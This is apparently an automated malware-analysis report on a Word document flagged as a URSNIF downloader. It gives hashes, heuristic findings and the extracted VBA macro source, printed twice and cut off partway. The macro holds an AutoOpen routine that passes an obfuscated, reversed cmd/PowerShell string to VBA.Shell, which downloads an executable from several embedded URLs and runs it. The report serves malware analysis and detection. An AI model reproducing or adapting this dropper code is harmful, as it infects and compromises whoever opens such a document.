Office (OLE) malware analysis — malicious · 4c33b67812858e9c

MALICIOUS

Office (OLE)

72.8 KB Created: 2018-09-04 19:01:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: e4e3413a3ef390d5550ba71f0b5120b6 SHA-1: b5792ee807fad92650509cafe10f958d0c9edb44 SHA-256: 4c33b67812858e9c5c70e5cbc459a7b2dbdf5ca1f09681bb108ec8144dabcea6

202 Risk Score

Heuristics 6

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5252 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5252 bytes
SHA-256: `768f656cf40a20cd593138cc15d7b47a33790271b586b852b7ef62c52f406631`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iwfCjJUwfjJCf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour "Sz" + "BoawTAv" + "89" + "wZikN" Hour "ciOP" + "2755" Hour "480508692" + "mfCGwqUP" VBA.Shell CleanString(d) + UjsJbJRYduMCn + DaTqGUVi + iKivC + tJNWrrnWchX + HHMWI + mJEDjiXNjbn + vmIJGTMmpNHM, 16 - 16 Hour "mVWzzbi" + "zMVz" + "165812889" + "405471774" Hour "356402494" + "oDsTvoXDzLP" End Sub Attribute VB_Name = "szvwrqz" Function iKivC() On _ Error _ Resume _ Next Hour "KjbRK" + "Qo" Hour "oztkuFodpSl" + "5103" rwFmcuo = "cmd" + " /V" + "^" + ":" + "^O/C" + Chr(1 + 4 + 5 + 0 + 24) + "s^" Hour "wn" + "265067591" + "28685012" + "3619" Hour "uJCt" + "448075348" Hour "uRjvZFncb" + "346989095" + "MjJ" + "I" Hour "wpdtj" + "mBPozk" + "420013514" + "UW" EjKbliuoj = "e^t rn=" + "^ ^ " + " ^ " + " ^" + " ^" + " ^" + " ^" + " }}" + "^{^h" + "ctac}" + "^;k^a" + "^erb;M" + "p^L$ m" Hour "SdcQ" + "J" Hour "U" + "zwlCNzztKRpsQ" Hour "opLw" + "7425" Tvlmw = "^" + "e" + "t" + "^" + "I^-ek^o" + "vnI;" + ")M^p^" + "L$" Hour "6803" + "AjbCrVr" + "932" + "2152621" LMsWE = "^" + " ^," + "Wh" + "X$(el" + "iF" + "d^" + "a" + "^" + "olnwo" + "^D^.qn" + "v${" + "yrt^{)V" + "^W" Hour "6692" + "273668008" + "QSXYFSjL" + "2443" lmZHcBAU = "^W^$^" + " " + "n^i^" + " ^W^h" + "^X^" + "$(h" Hour "aK" + "b" + "D" + "393993601" Hour "415719147" + "XHZ" + "lbUU" + "GuPZ" QHWXJqriJBq = "caero" + "f;'" + "^ex" + "e^.'+^" + "wMO" + "$^+^'" + "\^'^+c" + "^i^l" + "^b^" iKivC = rwFmcuo + EjKbliuoj + Tvlmw + LMsWE + lmZHcBAU + QHWXJqriJBq Hour "blQTjZ" + "BifRTK" Hour "zUQjW" + "mTiIdYBoF" + "WmomVDzb" + "rVFdzMOKzPRLlz" End Function Function tJNWrrnWchX() On _ Error _ Resume _ Next Hour "145202574" + "coj" + "622" + "NId" Hour "CUPN" + "s" + "jW" + "9841" Hour "hp" + "wPOEYn" + "lowSuR" + "ISSzDvSuuz" Hour "vWBShl" + "ETESVzNAtdV" Hour "oj" + "2104" XSvROPz = "up:" + "vn^" + "e" + "^$^=^" + "M^pL^$" + ";" + "^'3^9^" + "1^" + "' " + "^= w^" + "M" + "O$^" + ";)" Hour "RYHis" + "ql" Hour "N" + "DAz" + "8893" + "q" ojjNioVvqj = "'^@'" + "(t^i^l" + "^p^S.'^" + "9A" + "^1C/^t" + "ekcit" + "so/" + "22^1^.^" Hour "245300146" + "cPQFnwpk" + "313257960" + "52" Hour "j" + "8777" Hour "r" + "RjCHtVoKHFKD" IdkMUjkUa = "0^9^1" + "^.^1" + "51^." + "^" + "1" + "9//^:pt" + "^t^h^" + "@^or" + "7^J^Y/u" + "^a^.m^o" + "c^.r" + "el^l^" + "imw^er" Hour "wQ" + "455522310" + "ZRWwTwpJ" + "247" Hour "IRawSs" + "abLIjDIc" + "XFYUPfDR" + "124531472" Hour "7496" + "OK" + "3511" + "wachNV" Hour "UsBjou" + "ikTLq" + "6332" + "lm" MOkcjtp = "^dn^a/" + "/^:" + "ptt^h" + "@b^3^" + "w/" + "v" + "vvww/^" Hour "DTGKoiDEDOW" + "A" + "FMiPz" + "LiOpjNYOd" Hour "248822888" + "178407565" HHJzs = "k^u^.^" + "oc^" + "." + "^b^" + "e" + "w^e" + "^ht^4/" tJNWrrnWchX = XSvROPz + ojjNioVvqj + IdkMUjkUa + MOkcjtp + HHJzs Hour "EXH" + "AT" + "351977134" + "A" End Function Function HHMWI() On _ Error _ Resume _ Next Hour "BD" + "uJSUC" + "DcU" + "Qi" Hour "7450" + "oap" + "2143" + "78358508" DflMUNTIu = "/:^p" + "^tth^@^" + "0" + "w^i/^m" + "^" + "oc" + "^.o" + "rpi^a" + "ronlet" + "o^h//" + ":^p^t" Hour "vD" + "9242" + "379841930" + "9225" Hour "hvwfHJAo" + "3782" + "9645" + "oiE" SJmIzwEVcC = "t^h@^" + "0R" + "U9" + "^QY^k/" + "^m" + "oc^.^" + "ai^se" + "nodni" Hour "ui" + "146217161" Hour "B" + "3806" MSDBKYbww = "n^e" + "sg^i^b" + "//:p" + "t^" + "th'^=" + "VWW^$" + ";tn^" + "e^i^" Hour "pLdjHBkdqKbn" + "dX" + "442554008" + "LE" Hour "D" + "246833187" Hour "m" + "kPwwGn" Hour "z" + "7657" DNpow = "lC" + "^b" + "^e^W" + "^." + "^t^eN^ " + "tc^e^j" + "^" + "b" + "^o^-" + "^w^en^=" Hour "453417545" + "456071569" + "6638" + "187918776" Hour "160529415" + "wzDQGlnLd" + "4431 ... (truncated)

SHA-256: 768f656cf40a20cd593138cc15d7b47a33790271b586b852b7ef62c52f406631

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iwfCjJUwfjJCf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Hour "Sz" + "BoawTAv" + "89" + "wZikN"
   Hour "ciOP" + "2755"
   Hour "480508692" + "mfCGwqUP"
VBA.Shell CleanString(d) + UjsJbJRYduMCn + DaTqGUVi + iKivC + tJNWrrnWchX + HHMWI + mJEDjiXNjbn + vmIJGTMmpNHM, 16 - 16
   Hour "mVWzzbi" + "zMVz" + "165812889" + "405471774"
   Hour "356402494" + "oDsTvoXDzLP"
End Sub



Attribute VB_Name = "szvwrqz"
Function iKivC()

On _
Error _
Resume _
Next
Hour "KjbRK" + "Qo"
   Hour "oztkuFodpSl" + "5103"
rwFmcuo = "cmd" + " /V" + "^" + ":" + "^O/C" + Chr(1 + 4 + 5 + 0 + 24) + "s^"
Hour "wn" + "265067591" + "28685012" + "3619"
   Hour "uJCt" + "448075348"
   Hour "uRjvZFncb" + "346989095" + "MjJ" + "I"
   Hour "wpdtj" + "mBPozk" + "420013514" + "UW"
EjKbliuoj = "e^t rn=" + "^ ^  " + " ^  " + " ^" + "  ^" + "   ^" + "  ^" + "   }}" + "^{^h" + "ctac}" + "^;k^a" + "^erb;M" + "p^L$ m"
Hour "SdcQ" + "J"
   Hour "U" + "zwlCNzztKRpsQ"
   Hour "opLw" + "7425"
Tvlmw = "^" + "e" + "t" + "^" + "I^-ek^o" + "vnI;" + ")M^p^" + "L$"
Hour "6803" + "AjbCrVr" + "932" + "2152621"
LMsWE = "^" + " ^," + "Wh" + "X$(el" + "iF" + "d^" + "a" + "^" + "olnwo" + "^D^.qn" + "v${" + "yrt^{)V" + "^W"
Hour "6692" + "273668008" + "QSXYFSjL" + "2443"
lmZHcBAU = "^W^$^" + " " + "n^i^" + " ^W^h" + "^X^" + "$(h"
Hour "aK" + "b" + "D" + "393993601"
   Hour "415719147" + "XHZ" + "lbUU" + "GuPZ"
QHWXJqriJBq = "caero" + "f;'" + "^ex" + "e^.'+^" + "wMO" + "$^+^'" + "\^'^+c" + "^i^l" + "^b^"
iKivC = rwFmcuo + EjKbliuoj + Tvlmw + LMsWE + lmZHcBAU + QHWXJqriJBq
   Hour "blQTjZ" + "BifRTK"
   Hour "zUQjW" + "mTiIdYBoF" + "WmomVDzb" + "rVFdzMOKzPRLlz"
End Function
Function tJNWrrnWchX()

On _
Error _
Resume _
Next
Hour "145202574" + "coj" + "622" + "NId"
   Hour "CUPN" + "s" + "jW" + "9841"
   Hour "hp" + "wPOEYn" + "lowSuR" + "ISSzDvSuuz"
   Hour "vWBShl" + "ETESVzNAtdV"
   Hour "oj" + "2104"
XSvROPz = "up:" + "vn^" + "e" + "^$^=^" + "M^pL^$" + ";" + "^'3^9^" + "1^" + "' " + "^= w^" + "M" + "O$^" + ";)"
Hour "RYHis" + "ql"
   Hour "N" + "DAz" + "8893" + "q"
ojjNioVvqj = "'^@'" + "(t^i^l" + "^p^S.'^" + "9A" + "^1C/^t" + "ekcit" + "so/" + "22^1^.^"
Hour "245300146" + "cPQFnwpk" + "313257960" + "52"
   Hour "j" + "8777"
   Hour "r" + "RjCHtVoKHFKD"
IdkMUjkUa = "0^9^1" + "^.^1" + "51^." + "^" + "1" + "9//^:pt" + "^t^h^" + "@^or" + "7^J^Y/u" + "^a^.m^o" + "c^.r" + "el^l^" + "imw^er"
Hour "wQ" + "455522310" + "ZRWwTwpJ" + "247"
   Hour "IRawSs" + "abLIjDIc" + "XFYUPfDR" + "124531472"
   Hour "7496" + "OK" + "3511" + "wachNV"
   Hour "UsBjou" + "ikTLq" + "6332" + "lm"
MOkcjtp = "^dn^a/" + "/^:" + "ptt^h" + "@b^3^" + "w/" + "v" + "vvww/^"
Hour "DTGKoiDEDOW" + "A" + "FMiPz" + "LiOpjNYOd"
   Hour "248822888" + "178407565"
HHJzs = "k^u^.^" + "oc^" + "." + "^b^" + "e" + "w^e" + "^ht^4/"
tJNWrrnWchX = XSvROPz + ojjNioVvqj + IdkMUjkUa + MOkcjtp + HHJzs
   Hour "EXH" + "AT" + "351977134" + "A"
End Function
Function HHMWI()

On _
Error _
Resume _
Next
Hour "BD" + "uJSUC" + "DcU" + "Qi"
   Hour "7450" + "oap" + "2143" + "78358508"
DflMUNTIu = "/:^p" + "^tth^@^" + "0" + "w^i/^m" + "^" + "oc" + "^.o" + "rpi^a" + "ronlet" + "o^h//" + ":^p^t"
Hour "vD" + "9242" + "379841930" + "9225"
   Hour "hvwfHJAo" + "3782" + "9645" + "oiE"
SJmIzwEVcC = "t^h@^" + "0R" + "U9" + "^QY^k/" + "^m" + "oc^.^" + "ai^se" + "nodni"
Hour "ui" + "146217161"
   Hour "B" + "3806"
MSDBKYbww = "n^e" + "sg^i^b" + "//:p" + "t^" + "th'^=" + "VWW^$" + ";tn^" + "e^i^"
Hour "pLdjHBkdqKbn" + "dX" + "442554008" + "LE"
   Hour "D" + "246833187"
   Hour "m" + "kPwwGn"
   Hour "z" + "7657"
DNpow = "lC" + "^b" + "^e^W" + "^." + "^t^eN^ " + "tc^e^j" + "^" + "b" + "^o^-" + "^w^en^="
Hour "453417545" + "456071569" + "6638" + "187918776"
   Hour "160529415" + "wzDQGlnLd" + "4431
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.